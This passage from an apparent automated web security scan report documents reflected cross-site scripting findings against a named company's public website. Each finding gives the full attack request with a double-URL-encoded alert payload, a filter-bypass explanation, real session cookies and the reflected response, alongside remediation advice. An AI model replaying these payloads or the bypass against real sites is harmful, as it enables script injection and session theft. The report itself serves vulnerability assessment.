Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-intereste30da";alert(1)//329cab1f52b/life-science/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.124. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3856b%2522%253balert%25281%2529%252f%252f49ce609ccd7 was submitted in the REST URL parameter 4. This input was echoed as 3856b";alert(1)//49ce609ccd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science3856b%2522%253balert%25281%2529%252f%252f49ce609ccd7/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science3856b";alert(1)//49ce609ccd7/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.125. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75418%2522%253balert%25281%2529%252f%252f03a73ef7977 was submitted in the REST URL parameter 5. This input was echoed as 75418";alert(1)//03a73ef7977 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics75418%2522%253balert%25281%2529%252f%252f03a73ef7977 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics75418";alert(1)//03a73ef7977","E404") ;
   </script>
...[SNIP]...

1.126. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7714e%2522%253balert%25281%2529%252f%252f236e942502 was submitted in the REST URL parameter 1. This input was echoed as 7714e";alert(1)//236e942502 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content7714e%2522%253balert%25281%2529%252f%252f236e942502/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28998
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content7714e";alert(1)//236e942502/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.127. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33a1%2522%253balert%25281%2529%252f%252f8c3c0427d0e was submitted in the REST URL parameter 2. This input was echoed as b33a1";alert(1)//8c3c0427d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichb33a1%2522%253balert%25281%2529%252f%252f8c3c0427d0e/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichb33a1";alert(1)//8c3c0427d0e/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.128. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c6d1%2522%253balert%25281%2529%252f%252fc5eabbb08ea was submitted in the REST URL parameter 3. This input was echoed as 1c6d1";alert(1)//c5eabbb08ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest1c6d1%2522%253balert%25281%2529%252f%252fc5eabbb08ea/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
